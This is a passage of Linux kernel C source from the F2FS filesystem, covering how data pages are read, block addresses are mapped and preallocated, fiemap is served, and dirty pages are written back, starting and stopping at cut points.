* new inode page couldn't be allocated due to -ENOSPC.
	 * In such a case, its blkaddr remains NEW_ADDR.
	 * See f2fs_add_link -> get_new_data_page -> init_inode_metadata.
*/
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
return page;
}
fio.new_blkaddr = fio.old_blkaddr = dn.data_blkaddr;
fio.page = page;
err = f2fs_submit_page_bio(&fio);
if (err)
goto put_err;
return page;
put_err:
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
struct page *find_data_page(struct inode *inode, pgoff_t index)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
page = find_get_page(mapping, index);
if (page && PageUptodate(page))
return page;
f2fs_put_page(page, 0);
page = get_read_data_page(inode, index, 0, false);
if (IS_ERR(page))
return page;
if (PageUptodate(page))
return page;
wait_on_page_locked(page);
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 0);
return ERR_PTR(-EIO);
}
return page;
}
/*
* If it tries to access a hole, return an error.
 * This is because the callers, i.e. functions in dir.c and GC, need to know
 * whether this page exists or not.
*/
struct page *get_lock_data_page(struct inode *inode, pgoff_t index,
bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
repeat:
page = get_read_data_page(inode, index, 0, for_write);
if (IS_ERR(page))
return page;
/* wait for read completion */
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 1);
return ERR_PTR(-EIO);
}
return page;
}
/*
* Caller ensures that this data page is never allocated.
* A new zero-filled data page is allocated in the page cache.
*
* Also, caller should grab and release a rwsem by calling f2fs_lock_op() and
* f2fs_unlock_op().
* Note that, ipage is set only by make_empty_dir, and if any error occur,
* ipage should be released by this function.
*/
struct page *get_new_data_page(struct inode *inode,
struct page *ipage, pgoff_t index, bool new_i_size)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
struct dnode_of_data dn;
int err;
page = f2fs_grab_cache_page(mapping, index, true);
if (!page) {
/*
* before exiting, we should make sure ipage will be released
* if any error occur.
*/
f2fs_put_page(ipage, 1);
return ERR_PTR(-ENOMEM);
}
set_new_dnode(&dn, inode, ipage, NULL, 0);
err = f2fs_reserve_block(&dn, index);
if (err) {
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
if (!ipage)
f2fs_put_dnode(&dn);
if (PageUptodate(page))
goto got_it;
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
f2fs_put_page(page, 1);
/* if ipage exists, blkaddr should be NEW_ADDR */
f2fs_bug_on(F2FS_I_SB(inode), ipage);
page = get_lock_data_page(inode, index, true);
if (IS_ERR(page))
return page;
}
got_it:
if (new_i_size && i_size_read(inode) <
((loff_t)(index + 1) << PAGE_SHIFT))
f2fs_i_size_write(inode, ((loff_t)(index + 1) << PAGE_SHIFT));
return page;
}
static int __allocate_data_block(struct dnode_of_data *dn)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
struct f2fs_summary sum;
struct node_info ni;
pgoff_t fofs;
blkcnt_t count = 1;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
dn->data_blkaddr = datablock_addr(dn->node_page, dn->ofs_in_node);
if (dn->data_blkaddr == NEW_ADDR)
goto alloc;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
alloc:
get_node_info(sbi, dn->nid, &ni);
set_summary(&sum, dn->nid, dn->ofs_in_node, ni.version);
allocate_data_block(sbi, NULL, dn->data_blkaddr, &dn->data_blkaddr,
&sum, CURSEG_WARM_DATA);
set_data_blkaddr(dn);
/* update i_size */
fofs = start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
dn->ofs_in_node;
if (i_size_read(dn->inode) < ((loff_t)(fofs + 1) << PAGE_SHIFT))
f2fs_i_size_write(dn->inode,
((loff_t)(fofs + 1) << PAGE_SHIFT));
return 0;
}
static inline bool __force_buffered_io(struct inode *inode, int rw)
{
return ((f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) ||
(rw == WRITE && test_opt(F2FS_I_SB(inode), LFS)) ||
F2FS_I_SB(inode)->s_ndevs);
}
int f2fs_preallocate_blocks(struct kiocb *iocb, struct iov_iter *from)
{
struct inode *inode = file_inode(iocb->ki_filp);
struct f2fs_map_blocks map;
int err = 0;
if (is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
map.m_lblk = F2FS_BLK_ALIGN(iocb->ki_pos);
map.m_len = F2FS_BYTES_TO_BLK(iocb->ki_pos + iov_iter_count(from));
if (map.m_len > map.m_lblk)
map.m_len -= map.m_lblk;
else
map.m_len = 0;
map.m_next_pgofs = NULL;
if (iocb->ki_flags & IOCB_DIRECT) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
return f2fs_map_blocks(inode, &map, 1,
__force_buffered_io(inode, WRITE) ?
F2FS_GET_BLOCK_PRE_AIO :
F2FS_GET_BLOCK_PRE_DIO);
}
if (iocb->ki_pos + iov_iter_count(from) > MAX_INLINE_DATA) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
}
if (!f2fs_has_inline_data(inode))
return f2fs_map_blocks(inode, &map, 1, F2FS_GET_BLOCK_PRE_AIO);
return err;
}
/*
* f2fs_map_blocks() now supported readahead/bmap/rw direct_IO with
* f2fs_map_blocks structure.
* If original data blocks are allocated, then give them to blockdev.
* Otherwise,
* a. preallocate requested block addresses
* b. do not use extent cache for better performance
* c. give the block addresses to blockdev
*/
int f2fs_map_blocks(struct inode *inode, struct f2fs_map_blocks *map,
int create, int flag)
{
unsigned int maxblocks = map->m_len;
struct dnode_of_data dn;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
int mode = create ? ALLOC_NODE : LOOKUP_NODE;
pgoff_t pgofs, end_offset, end;
int err = 0, ofs = 1;
unsigned int ofs_in_node, last_ofs_in_node;
blkcnt_t prealloc;
struct extent_info ei;
block_t blkaddr;
if (!maxblocks)
return 0;
map->m_len = 0;
map->m_flags = 0;
/* it only supports block size == page size */
pgofs = (pgoff_t)map->m_lblk;
end = pgofs + maxblocks;
if (!create && f2fs_lookup_extent_cache(inode, pgofs, &ei)) {
map->m_pblk = ei.blk + pgofs - ei.fofs;
map->m_len = min((pgoff_t)maxblocks, ei.fofs + ei.len - pgofs);
map->m_flags = F2FS_MAP_MAPPED;
goto out;
}
next_dnode:
if (create)
f2fs_lock_op(sbi);
/* When reading holes, we need its node page */
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, pgofs, mode);
if (err) {
if (flag == F2FS_GET_BLOCK_BMAP)
map->m_pblk = 0;
if (err == -ENOENT) {
err = 0;
if (map->m_next_pgofs)
*map->m_next_pgofs =
get_next_page_offset(&dn, pgofs);
}
goto unlock_out;
}
prealloc = 0;
last_ofs_in_node = ofs_in_node = dn.ofs_in_node;
end_offset = ADDRS_PER_PAGE(dn.node_page, inode);
next_block:
blkaddr = datablock_addr(dn.node_page, dn.ofs_in_node);
if (blkaddr == NEW_ADDR || blkaddr == NULL_ADDR) {
if (create) {
if (unlikely(f2fs_cp_error(sbi))) {
err = -EIO;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_PRE_AIO) {
if (blkaddr == NULL_ADDR) {
prealloc++;
last_ofs_in_node = dn.ofs_in_node;
}
} else {
err = __allocate_data_block(&dn);
if (!err)
set_inode_flag(inode, FI_APPEND_WRITE);
}
if (err)
goto sync_out;
map->m_flags = F2FS_MAP_NEW;
blkaddr = dn.data_blkaddr;
} else {
if (flag == F2FS_GET_BLOCK_BMAP) {
map->m_pblk = 0;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_FIEMAP &&
blkaddr == NULL_ADDR) {
if (map->m_next_pgofs)
*map->m_next_pgofs = pgofs + 1;
}
if (flag != F2FS_GET_BLOCK_FIEMAP ||
blkaddr != NEW_ADDR)
goto sync_out;
}
}
if (flag == F2FS_GET_BLOCK_PRE_AIO)
goto skip;
if (map->m_len == 0) {
/* preallocated unwritten block should be mapped for fiemap. */
if (blkaddr == NEW_ADDR)
map->m_flags |= F2FS_MAP_UNWRITTEN;
map->m_flags |= F2FS_MAP_MAPPED;
map->m_pblk = blkaddr;
map->m_len = 1;
} else if ((map->m_pblk != NEW_ADDR &&
blkaddr == (map->m_pblk + ofs)) ||
(map->m_pblk == NEW_ADDR && blkaddr == NEW_ADDR) ||
flag == F2FS_GET_BLOCK_PRE_DIO) {
ofs++;
map->m_len++;
} else {
goto sync_out;
}
skip:
dn.ofs_in_node++;
pgofs++;
/* preallocate blocks in batch for one dnode page */
if (flag == F2FS_GET_BLOCK_PRE_AIO &&
(pgofs == end || dn.ofs_in_node == end_offset)) {
dn.ofs_in_node = ofs_in_node;
err = reserve_new_blocks(&dn, prealloc);
if (err)
goto sync_out;
map->m_len += dn.ofs_in_node - ofs_in_node;
if (prealloc && dn.ofs_in_node != last_ofs_in_node + 1) {
err = -ENOSPC;
goto sync_out;
}
dn.ofs_in_node = end_offset;
}
if (pgofs >= end)
goto sync_out;
else if (dn.ofs_in_node < end_offset)
goto next_block;
f2fs_put_dnode(&dn);
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
goto next_dnode;
sync_out:
f2fs_put_dnode(&dn);
unlock_out:
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
out:
trace_f2fs_map_blocks(inode, map, err);
return err;
}
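/*
 * Common helper that translates a get_block_t style request into an
 * f2fs_map_blocks() call and copies the result back into the buffer_head.
 */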
static int __get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh, int create, int flag,
pgoff_t *next_pgofs)
{
struct f2fs_map_blocks map;
int err;
map.m_lblk = iblock;
map.m_len = bh->b_size >> inode->i_blkbits;
map.m_next_pgofs = next_pgofs;
err = f2fs_map_blocks(inode, &map, create, flag);
if (!err) {
map_bh(bh, inode->i_sb, map.m_pblk);
bh->b_state = (bh->b_state & ~F2FS_MAP_FLAGS) | map.m_flags;
bh->b_size = (u64)map.m_len << inode->i_blkbits;
}
return err;
}
static int get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create, int flag,
pgoff_t *next_pgofs)
{
return __get_data_block(inode, iblock, bh_result, create,
flag, next_pgofs);
}
static int get_data_block_dio(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_DIO, NULL);
}
static int get_data_block_bmap(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
/* Block number less than F2FS MAX BLOCKS */
if (unlikely(iblock >= F2FS_I_SB(inode)->max_file_blocks))
return -EFBIG;
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_BMAP, NULL);
}
static inline sector_t logical_to_blk(struct inode *inode, loff_t offset)
{
return (offset >> inode->i_blkbits);
}
static inline loff_t blk_to_logical(struct inode *inode, sector_t blk)
{
return (blk << inode->i_blkbits);
}
int f2fs_fiemap(struct inode *inode, struct fiemap_extent_info *fieinfo,
u64 start, u64 len)
{
struct buffer_head map_bh;
sector_t start_blk, last_blk;
pgoff_t next_pgofs;
u64 logical = 0, phys = 0, size = 0;
u32 flags = 0;
int ret = 0;
ret = fiemap_check_flags(fieinfo, FIEMAP_FLAG_SYNC);
if (ret)
return ret;
if (f2fs_has_inline_data(inode)) {
ret = f2fs_inline_data_fiemap(inode, fieinfo, start, len);
if (ret != -EAGAIN)
return ret;
}
inode_lock(inode);
if (logical_to_blk(inode, len) == 0)
len = blk_to_logical(inode, 1);
start_blk = logical_to_blk(inode, start);
last_blk = logical_to_blk(inode, start + len - 1);
next:
memset(&map_bh, 0, sizeof(struct buffer_head));
map_bh.b_size = len;
ret = get_data_block(inode, start_blk, &map_bh, 0,
F2FS_GET_BLOCK_FIEMAP, &next_pgofs);
if (ret)
goto out;
/* HOLE */
if (!buffer_mapped(&map_bh)) {
start_blk = next_pgofs;
if (blk_to_logical(inode, start_blk) < blk_to_logical(inode,
F2FS_I_SB(inode)->max_file_blocks))
goto prep_next;
flags |= FIEMAP_EXTENT_LAST;
}
if (size) {
if (f2fs_encrypted_inode(inode))
flags |= FIEMAP_EXTENT_DATA_ENCRYPTED;
ret = fiemap_fill_next_extent(fieinfo, logical,
phys, size, flags);
}
if (start_blk > last_blk || ret)
goto out;
logical = blk_to_logical(inode, start_blk);
phys = blk_to_logical(inode, map_bh.b_blocknr);
size = map_bh.b_size;
flags = 0;
if (buffer_unwritten(&map_bh))
flags = FIEMAP_EXTENT_UNWRITTEN;
start_blk += logical_to_blk(inode, size);
prep_next:
cond_resched();
if (fatal_signal_pending(current))
ret = -EINTR;
else
goto next;
out:
if (ret == 1)
ret = 0;
inode_unlock(inode);
return ret;
}
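/*
 * Allocate a read bio targeting @blkaddr. For encrypted regular files a
 * decryption context is attached and any writeback of the GCed encrypted
 * page is waited for first.
 */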
static struct bio *f2fs_grab_bio(struct inode *inode, block_t blkaddr,
unsigned nr_pages)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct fscrypt_ctx *ctx = NULL;
struct bio *bio;
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
ctx = fscrypt_get_ctx(inode, GFP_NOFS);
if (IS_ERR(ctx))
return ERR_CAST(ctx);
/* wait for the page to be moved by cleaning */
f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
}
bio = bio_alloc(GFP_KERNEL, min_t(int, nr_pages, BIO_MAX_PAGES));
if (!bio) {
if (ctx)
fscrypt_release_ctx(ctx);
return ERR_PTR(-ENOMEM);
}
f2fs_target_device(sbi, blkaddr, bio);
bio->bi_end_io = f2fs_read_end_io;
bio->bi_private = ctx;
return bio;
}
/*
* This function was originally taken from fs/mpage.c, and customized for f2fs.
* Major change was from block_size == page_size in f2fs by default.
*/
static int f2fs_mpage_readpages(struct address_space *mapping,
struct list_head *pages, struct page *page,
unsigned nr_pages)
{
struct bio *bio = NULL;
unsigned page_idx;
sector_t last_block_in_bio = 0;
struct inode *inode = mapping->host;
const unsigned blkbits = inode->i_blkbits;
const unsigned blocksize = 1 << blkbits;
sector_t block_in_file;
sector_t last_block;
sector_t last_block_in_file;
sector_t block_nr;
struct f2fs_map_blocks map;
map.m_pblk = 0;
map.m_lblk = 0;
map.m_len = 0;
map.m_flags = 0;
map.m_next_pgofs = NULL;
for (page_idx = 0; nr_pages; page_idx++, nr_pages--) {
prefetchw(&page->flags);
if (pages) {
page = list_last_entry(pages, struct page, lru);
list_del(&page->lru);
if (add_to_page_cache_lru(page, mapping,
page->index,
readahead_gfp_mask(mapping)))
goto next_page;
}
block_in_file = (sector_t)page->index;
last_block = block_in_file + nr_pages;
last_block_in_file = (i_size_read(inode) + blocksize - 1) >>
blkbits;
if (last_block > last_block_in_file)
last_block = last_block_in_file;
/*
* Map blocks using the previous result first.
*/
if ((map.m_flags & F2FS_MAP_MAPPED) &&
block_in_file > map.m_lblk &&
block_in_file < (map.m_lblk + map.m_len))
goto got_it;
/*
* Then do more f2fs_map_blocks() calls until we are
* done with this page.
*/
map.m_flags = 0;
if (block_in_file < last_block) {
map.m_lblk = block_in_file;
map.m_len = last_block - block_in_file;
if (f2fs_map_blocks(inode, &map, 0,
F2FS_GET_BLOCK_READ))
goto set_error_page;
}
got_it:
if ((map.m_flags & F2FS_MAP_MAPPED)) {
block_nr = map.m_pblk + block_in_file - map.m_lblk;
SetPageMappedToDisk(page);
if (!PageUptodate(page) && !cleancache_get_page(page)) {
SetPageUptodate(page);
goto confused;
}
} else {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
goto next_page;
}
/*
* This page will go to BIO. Do we need to send this
* BIO off first?
*/
if (bio && (last_block_in_bio != block_nr - 1 ||
!__same_bdev(F2FS_I_SB(inode), block_nr, bio))) {
submit_and_realloc:
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
if (bio == NULL) {
bio = f2fs_grab_bio(inode, block_nr, nr_pages);
if (IS_ERR(bio)) {
bio = NULL;
goto set_error_page;
}
bio_set_op_attrs(bio, REQ_OP_READ, 0);
}
if (bio_add_page(bio, page, blocksize, 0) < blocksize)
goto submit_and_realloc;
last_block_in_bio = block_nr;
goto next_page;
set_error_page:
SetPageError(page);
zero_user_segment(page, 0, PAGE_SIZE);
unlock_page(page);
goto next_page;
confused:
if (bio) {
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
unlock_page(page);
next_page:
if (pages)
put_page(page);
}
BUG_ON(pages && !list_empty(pages));
if (bio)
__submit_bio(F2FS_I_SB(inode), bio, DATA);
return 0;
}
static int f2fs_read_data_page(struct file *file, struct page *page)
{
struct inode *inode = page->mapping->host;
int ret = -EAGAIN;
trace_f2fs_readpage(page, DATA);
/* If the file has inline data, try to read it directly */
if (f2fs_has_inline_data(inode))
ret = f2fs_read_inline_data(inode, page);
if (ret == -EAGAIN)
ret = f2fs_mpage_readpages(page->mapping, NULL, page, 1);
return ret;
}
static int f2fs_read_data_pages(struct file *file,
struct address_space *mapping,
struct list_head *pages, unsigned nr_pages)
{
struct inode *inode = file->f_mapping->host;
struct page *page = list_last_entry(pages, struct page, lru);
trace_f2fs_readpages(inode, page, nr_pages);
/* If the file has inline data, skip readpages */
if (f2fs_has_inline_data(inode))
return 0;
return f2fs_mpage_readpages(mapping, pages, NULL, nr_pages);
}
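/*
 * Write one data page to disk: look up its block address, encrypt the page
 * if needed, and then either rewrite it in place (IPU) or write it out of
 * place to a newly allocated block (OPU).
 */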
int do_write_data_page(struct f2fs_io_info *fio)
{
struct page *page = fio->page;
struct inode *inode = page->mapping->host;
struct dnode_of_data dn;
int err = 0;
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, page->index, LOOKUP_NODE);
if (err)
return err;
fio->old_blkaddr = dn.data_blkaddr;
/* This page is already truncated */
if (fio->old_blkaddr == NULL_ADDR) {
ClearPageUptodate(page);
goto out_writepage;
}
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
gfp_t gfp_flags = GFP_NOFS;
/* wait for GCed encrypted page writeback */
f2fs_wait_on_encrypted_page_writeback(F2FS_I_SB(inode),
fio->old_blkaddr);
retry_encrypt:
fio->encrypted_page = fscrypt_encrypt_page(inode, fio->page,
PAGE_SIZE, 0,
fio->page->index,
gfp_flags);
if (IS_ERR(fio->encrypted_page)) {
err = PTR_ERR(fio->encrypted_page);
if (err == -ENOMEM) {
/* flush pending ios and wait for a while */
f2fs_flush_merged_bios(F2FS_I_SB(inode));
congestion_wait(BLK_RW_ASYNC, HZ/50);
gfp_flags |= __GFP_NOFAIL;
err = 0;
goto retry_encrypt;
}
goto out_writepage;
}
}
set_page_writeback(page);
/*
* If the current allocation needs SSR,
* in-place writes are preferred for updated data.
*/
if (unlikely(fio->old_blkaddr != NEW_ADDR &&
!is_cold_data(page) &&
!IS_ATOMIC_WRITTEN_PAGE(page) &&
need_inplace_update(inode))) {
rewrite_data_page(fio);
set_inode_flag(inode, FI_UPDATE_WRITE);
trace_f2fs_do_write_data_page(page, IPU);
} else {
write_data_page(&dn, fio);
trace_f2fs_do_write_data_page(page, OPU);
set_inode_flag(inode, FI_APPEND_WRITE);
if (page->index == 0)
set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
}
out_writepage:
f2fs_put_dnode(&dn);
return err;
}
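/*
 * ->writepage callback: pages beyond i_size are skipped, the tail of a
 * partially valid last page is zeroed, and the page is redirtied whenever
 * writeback cannot proceed right now.
 */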
static int f2fs_write_data_page(struct page *page,
struct writeback_control *wbc)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
loff_t i_size = i_size_read(inode);
const pgoff_t end_index = ((unsigned long long) i_size)
>> PAGE_SHIFT;
loff_t psize = ((loff_t)(page->index + 1)) << PAGE_SHIFT;
unsigned offset = 0;
bool need_balance_fs = false;
int err = 0;
struct f2fs_io_info fio = {
.sbi = sbi,
.type = DATA,
.op = REQ_OP_WRITE,
.op_flags = wbc_to_write_flags(wbc),
.page = page,
.encrypted_page = NULL,
};
trace_f2fs_writepage(page, DATA);
if (page->index < end_index)
goto write;
/*
* If the offset is out-of-range of file size,
* this page does not have to be written to disk.
*/
offset = i_size & (PAGE_SIZE - 1);
if ((page->index >= end_index + 1) || !offset)
goto out;
zero_user_segment(page, offset, PAGE_SIZE);
write:
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto redirty_out;
if (f2fs_is_drop_cache(inode))
goto out;
/* we should not write the 0'th page, which holds the journal header */
if (f2fs_is_volatile_file(inode) && (!page->index ||
(!wbc->for_reclaim &&
available_free_memory(sbi, BASE_CHECK))))
goto redirty_out;
/* we should bypass data pages to let the kworker jobs proceed */
if (unlikely(f2fs_cp_error(sbi))) {
mapping_set_error(page->mapping, -EIO);
goto out;
}
/* Dentry blocks are controlled by checkpoint */
if (S_ISDIR(inode->i_mode)) {
err = do_write_data_page(&fio);
goto done;
}
if (!wbc->for_reclaim)
need_balance_fs = true;
else if (has_not_enough_free_secs(sbi, 0, 0))
goto redirty_out;
err = -EAGAIN;
f2fs_lock_op(sbi);
if (f2fs_has_inline_data(inode))
err = f2fs_write_inline_data(inode, page);
if (err == -EAGAIN)
err = do_write_data_page(&fio);
if (F2FS_I(inode)->last_disk_size < psize)
F2FS_I(inode)->last_disk_size = psize;
f2fs_unlock_op(sbi);
done:
if (err && err != -ENOENT)
goto redirty_out;
out:
inode_dec_dirty_pages(inode);
if (err)
ClearPageUptodate(page);
if (wbc->for_reclaim) {
f2fs_submit_merged_bio_cond(sbi, NULL, page, 0, DATA, WRITE);
remove_dirty_inode(inode);
}
unlock_page(page);
f2fs_balance_fs(sbi, need_balance_fs);
if (unlikely(f2fs_cp_error(sbi)))
f2fs_submit_merged_bio(sbi, DATA, WRITE);
return 0;
redirty_out:
redirty_page_for_writepage(wbc, page);
if (!err)
return AOP_WRITEPAGE_ACTIVATE;
unlock_page(page);
return err;
}
/*
* This function was copied from write_cache_pages in mm/page-writeback.c.
* The major change is writing cold data pages separately from
* warm/hot data pages.
*/
static int f2fs_write_cache_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
int ret = 0;
int done = 0;
struct pagevec pvec;
int nr_pages;
pgoff_t uninitialized_var(writeback_index);
pgoff_t index;
pgoff_t end; /* Inclusive */
pgoff_t done_index;
int cycled;
int range_whole = 0;
int tag;
int nwritten = 0;
pagevec_init(&pvec, 0);
if (wbc->range_cyclic) {
writeback_index = mapping->writeback_index; /* prev offset */
index = writeback_index;
if (index == 0)
cycled = 1;
else
cycled = 0;
end = -1;
} else {
index = wbc->range_start >> PAGE_SHIFT;
end = wbc->range_end >> PAGE_SHIFT;
if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
range_whole = 1;
cycled = 1; /* ignore range_cyclic tests */
}
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag = PAGECACHE_TAG_TOWRITE;
else
tag = PAGECACHE_TAG_DIRTY;
retry:
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag_pages_for_writeback(mapping, index, end);
done_index = index;
while (!done && (index <= end)) {
int i;
nr_pages = pagevec_lookup_tag(&pvec, mapping, &index, tag,
min(end - index, (pgoff_t)PAGEVEC_SIZE - 1) + 1);
if (nr_pages == 0)
break;
for (i = 0; i < nr_pages; i++) {
struct page *page = pvec.pages[i];
if (page->index > end) {
done = 1;
break;
}
done_index = page->index;
lock_page(page);
if (unlikely(page->mapping != mapping)) {
continue_unlock:
unlock_page(page);
continue;
}
if (!PageDirty(page)) {
/* someone wrote it for us */
goto continue_unlock;
}
if (PageWriteback(page)) {
if (wbc->sync_mode != WB_SYNC_NONE)
f2fs_wait_on_page_writeback(page,
DATA, true);
else
goto continue_unlock;
}
BUG_ON(PageWriteback(page));
if (!clear_page_dirty_for_io(page))
goto continue_unlock;
ret = mapping->a_ops->writepage(page, wbc);
if (unlikely(ret)) {
/*
* keep nr_to_write, since vfs uses this to
* get # of written pages.
*/
if (ret == AOP_WRITEPAGE_ACTIVATE) {
unlock_page(page);
ret = 0;
continue;
}
done_index = page->index + 1;
done = 1;
break;
} else {
nwritten++;
}
if (--wbc->nr_to_write <= 0 &&
wbc->sync_mode == WB_SYNC_NONE) {
done = 1;
break;
}
}
pagevec_release(&pvec);
cond_resched();
}
if (!cycled && !done) {
cycled = 1;
index = 0;
end = writeback_index - 1;
goto retry;
}
if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
mapping->writeback_index = done_index;
if (nwritten)
f2fs_submit_merged_bio_cond(F2FS_M_SB(mapping), mapping->host,
NULL, 0, DATA, WRITE);
return ret;
}
static int f2fs_write_data_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct blk_plug plug;
int ret;
/* deal with chardevs and other special file */
if (!mapping->a_ops->writepage)
return 0;
/* skip writing if there is no dirty page in this inode */
if (!get_dirty_pages(inode) && wbc->sync_mode == WB_SYNC_NONE)
return 0;
if (S_ISDIR(inode->i_mode) && wbc->sync_mode == WB_SYNC_NONE &&
get_dirty_pages(inode) < nr_pages_to_skip(sbi, DATA) &&
available_free_memory(sbi, DIRTY_DENTS))
goto skip_write;
/* skip writing during file defragment */
if (is_inode_flag_set(inode, FI_DO_DEFRAG))
goto skip_write;
/* during POR, we don't need to trigger writepage at all. */
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto skip_write;
trace_f2fs_writepages(mapping->host, wbc, DATA);
blk_start_plug(&plug);
ret = f2fs_write_cache_pages(mapping, wbc);
blk_finish_plug(&plug);
/*
* if some pages were truncated, we cannot rely on mapping->host
* to detect pending bios.
*/
remove_dirty_inode(inode);
return ret;
skip_write:
wbc->pages_skipped += get_dirty_pages(inode);
trace_f2fs_writepages(mapping->host, wbc, DATA);
return 0;
}
static void f2fs_write_failed(struct address_space *mapping, loff_t to)
{
struct inode *inode = mapping->host;
loff_t i_size = i_size_read(inode);
if (to > i_size) {
truncate_pagecache(inode, i_size);
truncate_blocks(inode, i_size, true);
}
}
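/*
 * Look up (or reserve) the block address backing the page being written,
 * converting inline data when the write no longer fits inline.
 */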
static int prepare_write_begin(struct f2fs_sb_info *sbi,
struct page *page, loff_t pos, unsigned len,
block_t *blk_addr, bool *node_changed)
{
struct inode *inode = page->mapping->host;
pgoff_t index = page->index;
struct dnode_of_data dn;
struct page *ipage;
bool locked = false;
struct extent_info ei;
int err = 0;
/*
* we already allocated all the blocks, so we don't need to get
* the block addresses when there is no need to fill the page.
*/
if (!f2fs_has_inline_data(inode) && len == PAGE_SIZE &&
!is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
if (f2fs_has_inline_data(inode) ||
(pos & PAGE_MASK) >= i_size_read(inode)) {
f2fs_lock_op(sbi);
locked = true;
}
restart:
/* check inline_data */
ipage = get_node_page(sbi, inode->i_ino);
if (IS_ERR(ipage)) {
err = PTR_ERR(ipage);
goto unlock_out;
}
set_new_dnode(&dn, inode, ipage, ipage, 0);
if (f2fs_has_inline_data(inode)) {
if (pos + len <= MAX_INLINE_DATA) {
read_inline_data(page, ipage);
set_inode_flag(inode, FI_DATA_EXIST);
if (inode->i_nlink)
set_inline_node(ipage);
} else {
err = f2fs_convert_inline_page(&dn, page);
if (err)
goto out;
if (dn.data_blkaddr == NULL_ADDR)
err = f2fs_get_block(&dn, index);
}
} else if (locked) {
err = f2fs_get_block(&dn, index);
} else {
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
} else {
/* hole case */
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err || dn.data_blkaddr == NULL_ADDR) {
f2fs_put_dnode(&dn);
f2fs_lock_op(sbi);
locked = true;
goto restart;
}
}
}
/* convert_inline_page can make node_changed */
*blk_addr = dn.data_blkaddr;
*node_changed = dn.node_changed;
out:
f2fs_put_dnode(&dn);
unlock_out:
if (locked)
f2fs_unlock_op(sbi);
return err;
}
static int f2fs_write_begin(struct file *file, struct address_space *mapping,
loff_t pos, unsigned len, unsigned flags,
struct page **pagep, void **fsdata)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct page *page = NULL;
pgoff_t index = ((unsigned long long) pos) >> PAGE_SHIFT;
bool need_balance = false;
block_t blkaddr = NULL_ADDR;
int err = 0;
trace_f2fs_write_begin(inode, pos, len, flags);
/*
* We should check this at this moment to avoid deadlock on inode page
* and #0 page. The locking rule for inline_data conversion should be:
* lock_page(page #0) -> lock_page(inode_page)
*/
if (index != 0) {
err = f2fs_convert_inline_inode(inode);
if (err)
goto fail;
}
repeat:
page = grab_cache_page_write_begin(mapping, index, flags);
if (!page) {
err = -ENOMEM;
goto fail;
}
*pagep = page;
err = prepare_write_begin(sbi, page, pos, len,
&blkaddr, &need_balance);
if (err)
goto fail;
if (need_balance && has_not_enough_free_secs(sbi, 0, 0)) {
unlock_page(page);
f2fs_balance_fs(sbi, true);
lock_page(page);
if (page->mapping != mapping) {
/* The page got truncated from under us */
f2fs_put_page(page, 1);
goto repeat;
}
}
f2fs_wait_on_page_writeback(page, DATA, false);
/* wait for GCed encrypted page writeback */
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
